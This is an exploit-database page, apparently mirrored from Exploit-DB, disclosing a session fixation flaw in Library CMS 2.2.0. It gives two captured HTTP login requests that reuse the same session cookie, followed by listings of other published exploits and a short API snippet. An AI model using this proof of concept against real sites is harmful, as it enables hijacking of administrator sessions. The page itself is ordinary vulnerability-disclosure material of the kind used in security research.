Search for hundreds of thousands of exploits

"Library CMS Powerful Book Management System 2.2.0 - Session Fixation"

Author

Exploit author

"Ismail Tasdelen"

Platform

Exploit platform

php

Release date

Exploit published date

2020-04-23

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
# Exploit Title: Library CMS Powerful Book Management System 2.2.0 - Session Fixation
# Date: 2020-04-22 
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://kaasoft.pro/
# Software : https://codecanyon.net/item/library-cms-powerful-book-management-system/21105281
# Product Version: v2.2.0
# Product : Library CMS
# Vulernability Type : Broken Authentication
# Vulenrability : Session Fixation
# CVE : N/A

# Description :

Session Fixation vulnerability has been discovered in v2.2.0
version of Library CMS Powerful Book Management System.

Admin HTTP Request :

POST /admin/login HTTP/1.1
Host: XXX.XXX.XXX.XXX
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://XXX.XXX.XXX.XXX/admin/login
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
Connection: close
Cookie: activeLanguage=en_US; PHPSESSID=nfj6gk1murk6jq47lpk5cv7qq6; activeLanguage=en_US; _ym_uid=1579299191562269050; _ym_d=1579299191; _ym_visorc_46947615=w; _ym_isad=2
Upgrade-Insecure-Requests: 1

login=USERNAME&password=PASSWORD

Member HTTP Request :

POST /admin/login HTTP/1.1
Host: XXX.XXX.XXX.XXX
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://XXX.XXX.XXX.XXX/admin/login
Content-Type: application/x-www-form-urlencoded
Content-Length: 50
Connection: close
Cookie: activeLanguage=en_US; PHPSESSID=nfj6gk1murk6jq47lpk5cv7qq6; activeLanguage=en_US; _ym_uid=1579299191562269050; _ym_d=1579299191; _ym_visorc_46947615=w; _ym_isad=2
Upgrade-Insecure-Requests: 1

login=USERNAME&password=PASSWORD
Release DateTitleTypePlatformAuthor
2020-07-02"WhatsApp Remote Code Execution - Paper"webappsandroid"ashu Jaiswal"
2020-07-02"ZenTao Pro 8.8.2 - Command Injection"webappsphp"Daniel Monzón"
2020-07-02"OCS Inventory NG 2.7 - Remote Code Execution"webappsmultipleAskar
2020-07-01"Online Shopping Portal 3.1 - Authentication Bypass"webappsphp"Ümit Yalçın"
2020-07-01"e-learning Php Script 0.1.0 - 'search' SQL Injection"webappsphpKeopssGroup0day_Inc
2020-07-01"PHP-Fusion 9.03.60 - PHP Object Injection"webappsphpcoiffeur
2020-07-01"RM Downloader 2.50.60 2006.06.23 - 'Load' Local Buffer Overflow (EggHunter) (SEH) (PoC)"localwindows"Paras Bhatia"
2020-06-30"Reside Property Management 3.0 - 'profile' SQL Injection"webappsphp"Behzad Khalifeh"
2020-06-30"Victor CMS 1.0 - 'user_firstname' Persistent Cross-Site Scripting"webappsphp"Anushree Priyadarshini"
2020-06-26"Windscribe 1.83 - 'WindscribeService' Unquoted Service Path"localwindows"Ethan Seow"
Release DateTitleTypePlatformAuthor
2020-07-02"ZenTao Pro 8.8.2 - Command Injection"webappsphp"Daniel Monzón"
2020-07-01"Online Shopping Portal 3.1 - Authentication Bypass"webappsphp"Ümit Yalçın"
2020-07-01"e-learning Php Script 0.1.0 - 'search' SQL Injection"webappsphpKeopssGroup0day_Inc
2020-07-01"PHP-Fusion 9.03.60 - PHP Object Injection"webappsphpcoiffeur
2020-06-30"Victor CMS 1.0 - 'user_firstname' Persistent Cross-Site Scripting"webappsphp"Anushree Priyadarshini"
2020-06-30"Reside Property Management 3.0 - 'profile' SQL Injection"webappsphp"Behzad Khalifeh"
2020-06-26"OpenEMR 5.0.1 - 'controller' Remote Code Execution"webappsphp"Emre ÖVÜNÇ"
2020-06-25"FHEM 6.0 - Local File Inclusion"webappsphp"Emre ÖVÜNÇ"
2020-06-23"Responsive Online Blog 1.0 - 'id' SQL Injection"webappsphp"Eren Şimşek"
2020-06-23"Online Student Enrollment System 1.0 - Cross-Site Request Forgery (Add Student)"webappsphpBKpatron
Release DateTitleTypePlatformAuthor
2020-04-23"Library CMS Powerful Book Management System 2.2.0 - Session Fixation"webappsphp"Ismail Tasdelen"
2020-01-31"FlexNet Publisher 11.12.1 - Cross-Site Request Forgery (Add Local Admin)"webappsphp"Ismail Tasdelen"
2020-01-17"GTalk Password Finder 2.2.1 - 'Key' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-17"APKF Product Key Finder 2.5.8.0 - 'Name' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-16"Tautulli 2.1.9 - Denial of Service ( Metasploit )"webappsmultiple"Ismail Tasdelen"
2020-01-15"Huawei HG255 - Directory Traversal ( Metasploit )"webappshardware"Ismail Tasdelen"
2020-01-14"IBM RICOH InfoPrint 6500 Printer - HTML Injection"webappshardware"Ismail Tasdelen"
2020-01-14"IBM RICOH 6400 Printer - HTML Injection"webappshardware"Ismail Tasdelen"
2020-01-13"TaskCanvas 1.4.0 - 'Registration' Denial Of Service"doswindows"Ismail Tasdelen"
2020-01-13"SpotOutlook 1.2.6 - 'Name' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-13"Backup Key Recovery 2.2.5 - 'Name' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-13"SpotDialup 1.6.7 - 'Name' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-06"NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-06"SpotMSN 2.4.6 - 'Name' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-06"RemShutdown 2.9.0.0 - 'Name' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-06"Subrion CMS 4.0.5 - Cross-Site Request Forgery (Add Admin)"webappsphp"Ismail Tasdelen"
2020-01-06"SpotFTP FTP Password Recovery 3.0.0.0 - 'Key' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-06"RemShutdown 2.9.0.0 - 'Key' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-06"ShareAlarmPro Advanced Network Access Control - 'Key' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-06"NBMonitor 1.6.6.0 - 'Key' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-06"SpotIM 2.2 - 'Name' Denial Of Service"doswindows"Ismail Tasdelen"
2020-01-06"Dnss Domain Name Search Software - 'Name' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-06"Backup Key Recovery Recover Keys Crashed Hard Disk Drive 2.2.5 - 'Key' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-06"NetShareWatcher 1.5.8.0 - 'Key' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-06"SpotIE 2.9.5 - 'Key' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-06"Dnss Domain Name Search Software - 'Key' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-06"BlueAuditor 1.7.2.0 - 'Name' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-06"SpotFTP FTP Password Recovery 3.0.0.0 - 'Name' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-06"NetShareWatcher 1.5.8.0 - 'Name' Denial Of Service"doswindows"Ismail Tasdelen"
2020-01-06"IBM RICOH Infoprint 1532 Printer - Persistent Cross-Site Scripting"webappshardware"Ismail Tasdelen"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/48374/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.